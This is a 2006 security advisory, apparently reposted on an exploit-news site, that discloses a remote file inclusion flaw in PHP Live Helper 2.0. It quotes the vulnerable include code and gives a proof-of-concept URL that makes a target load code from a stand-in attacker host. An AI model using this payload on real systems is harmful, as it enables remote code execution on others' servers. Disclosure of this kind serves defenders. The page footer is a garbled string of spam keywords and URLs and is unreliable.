about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion Vulnerability




2006-08-07 PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion Vulnerability
Rated as : High Risk

\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                             
.OR.ID
ECHO_ADV_43$2006

------------------------------------------------------------------------------
[ECHO_ADV_43$2006] PHP Live Helper <= 2.0 (abs_path) Remote File
Inclusion
------------------------------------------------------------------------------

Author		: Ahmad Maulana a.k.a Matdhule
Date Found	: July, 02nd 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv4333-matdhule-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PHP Live Helper

Application	: PHP Live Helper
version		: Latest version [2.0]
URL		: http://www.turnkeywebtools.com/phplivehelper

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

-----------------------global.php----------------------
....
<?PHP
/*
  global.php - 05/30/2006 - 5:27pm PST - 2.0
  
  PHP Live Helper
  http://www.turnkeywebtools.com/phplivehelper/
  
  Copyright (c) 2001-2006 Turnkey Web Tools, Inc.
*/

define('PLH_SESSION_START', '1');

////////////////////////////
// Load Class & Secure Files
////////////////////////////

require_once $abs_path."/libsecure.php";
include_once $abs_path."/include/class.browser.php";
...
----------------------------------------------------------

Input passed to the "abs_path" parameter in global.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/[phplivehelper_path]/global.php?abs_path=http://attacker.com/inject.txt?

Solution:
~~~~~~~
- Sanitize variable $abs_path on global.php.

Notification:
~~~~~~~~~~

I've been contacting the web/software administrator to tell about this
hole in his system, 
but instead of giving  a nice response, he replied so rudely and
arrogantly. 
I recommend not to use this product for your own sake.

---------------------------------------------------------------------------
Shoutz:
~~~
~ solpot a.k.a chris, J4mbi  H4ck3r thx for the hacking lesson   :)  
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
 
     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ]----------------------------------
securitydot.net - 2006-08-07

Advertising

Copyright 2007, SecurityDot
Fri, 27 Nov 2009 07:08:48 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Marshandas Ara phphtml.ph www.53bl.n simbu naya www.53bl.n Gambar sas www.52car. WALLPAPER kamapisach www.5290h. zh.dh.vc phpbb 1.2 BANKING.ht www.51ub.c shortage o www.51mtw. Pic archiv www.youtu vivid vide www.51mmse my page www.51lian DDDDDDF 6.00ls Biliard www.518tui www.mjj88. Searching www.518nai www.517bz. lo894l shop584470 Hot sexey WWW.SHUKU Hot sexey www.sleazy www.5128ba Cr 00000F www.ytzcz. www.58wl.c nude kate www.502008 Blackpussy www.4hsky. seoq.cn ip+board+2 www.47oo.c vbb 3.6.4 shop576935